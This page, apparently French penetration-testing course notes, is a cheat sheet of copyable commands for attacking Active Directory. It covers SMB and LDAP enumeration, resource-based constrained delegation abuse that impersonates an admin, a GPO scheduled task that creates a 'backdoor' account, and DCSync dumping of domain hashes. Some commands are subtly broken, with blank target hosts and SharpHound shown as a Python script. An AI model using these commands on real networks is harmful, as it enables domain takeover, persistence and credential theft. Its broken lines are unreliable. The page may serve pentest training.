PENTEST · Nova Knowledge Hub

📄 PENTEST2 HS2 - Commandes d'exploitation

Cliquez sur une section pour voir les scénarios d'attaque complets avec commandes copiables.

📑 Vecteurs d'attaque (cliquer pour exploits)

SMB

Enum4linux, CrackMapExec, PSExec

LDAP

ldapsearch, BloodHound, SharpHound

RBCD

Kerberos delegation, S4U2self

GPO

SharpGPOAbuse, pivoting réseau

ACL / Privesc

BloodHound paths, DCSync

SMB - Enumération & Exploitation

# Énumération complète
enum4linux -a 

# Liste partages
smbclient -L // -N

# Connexion partage
smbclient ///share -N

Enumérer avec enum4linux
Vérifier accès anonyme
Extraire SID utilisateurs

LDAP - BloodHound

# Recherche LDAP
ldapsearch -x -H ldap:// -b 'DC=domain,DC=local'

# SharpHound
python SharpHound.py --domain domain.local -c All

# BloodHound GUI
bloodhound --no-sandbox

RBCD - Kerberos Delegation

# Créercomputer
python addcomputer.py 'domain/faible:creds' -computer-name 'FAKEPC$' -computer-pass 'Pass123!'

# Modifier RBCD
python rbcd.py 'domain/faible:creds' -action write -delegate-from FAKEPC$ -delegate-to VICTIMPC$

# Obtenir ticket
python getST.py -spn cifs/VICTIMPC.domain.local -impersonate admin 'domain/FAKEPC$:Pass123!'

GPO - SharpGPOAbuse

# Check GPOs
SharpGPOAbuse.exe --Action Check --NoAdmin

# Add backdoor task
SharpGPOAbuse.exe --Action AddComputerTask --TaskName "Backdoor" --Command "cmd /c net user backdoor Pass /add" --GPOIdentity "Default Domain Policy"

ACL - Privilege Escalation

# BloodHound ACLs
SharpHound.exe -c ACL --Loop

# DCSync (Domain Admin hash)
python secretsdump.py 'domain/USER:PASS@'

⚠️ Nécessite droit DS-Replication-Get-Changes-All

💡 Cliquez sur une commande pour copier